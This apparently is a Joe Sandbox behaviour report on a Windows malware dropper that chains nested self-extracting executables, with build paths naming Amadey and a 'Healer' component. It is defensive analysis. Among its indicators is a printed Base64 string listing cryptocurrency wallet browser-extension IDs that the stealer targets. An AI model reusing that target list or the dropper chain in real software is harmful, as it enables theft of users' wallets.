                          Source: fxV11fe.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 453990 bytes, 2 files, at 0x2c +A "faC80kI.exe" +A "cEB8028.exe", ID 1730, number 1, 21 datablocks, 0x1503 compression
                          Source: faC80kI.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 50172 bytes, 2 files, at 0x2c +A "atn32.exe" +A "bvr38xq.exe", ID 1830, number 1, 6 datablocks, 0x1503 compression
                          Source: file.exe, 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeSection loaded: sfc.dllJump to behavior
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe 9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                          Source: file.exeReversingLabs: Detection: 69%
                          Source: file.exeVirustotal: Detection: 59%
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_008D1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A01F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00A01F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A91F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00A91F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\atn32.exe.logJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/8@0/1
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_008D597D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_008D3FEF
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeCode function: 3_2_00007FF815F51B10 ChangeServiceConfigA,3_2_00007FF815F51B10
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: bvr38xq.exe.2.dr, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                          Source: 4.0.bvr38xq.exe.d70000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_008D4FE0
                          Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_008D2BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCommand line argument: Kernel32.dll1_2_00A02BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCommand line argument: Kernel32.dll2_2_00A92BFB
                          Source: C:\Users\user\Desktop\file.exeAutomated click: OK
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeAutomated click: OK
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: wextract.pdb source: file.exe, fxV11fe.exe.0.dr, faC80kI.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp, doa18JW.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: file.exe, fxV11fe.exe.0.dr, faC80kI.exe.1.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: faC80kI.exe, 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, atn32.exe, 00000003.00000000.306843047.0000000000232000.00000002.00000001.01000000.00000006.sdmp, atn32.exe.2.dr
                          Source: Binary string: .;C:\xotelogiwax.pdb source: fxV11fe.exe, 00000001.00000003.305814523.00000000050BF000.00000004.00000020.00020000.00000000.sdmp, cEB8028.exe.1.dr
                          Source: Binary string: C:\xotelogiwax.pdb source: fxV11fe.exe, 00000001.00000003.305814523.00000000050BF000.00000004.00000020.00020000.00000000.sdmp, cEB8028.exe.1.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D724D push ecx; ret 0_2_008D7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A0724D push ecx; ret 1_2_00A07260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A9724D push ecx; ret 2_2_00A97260
                          Source: cEB8028.exe.1.drStatic PE information: section name: .miyi
                          Source: cEB8028.exe.1.drStatic PE information: section name: .xiguda
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_008D2F1D
                          Source: atn32.exe.2.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_008D1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A01AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00A01AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A91AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00A91AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
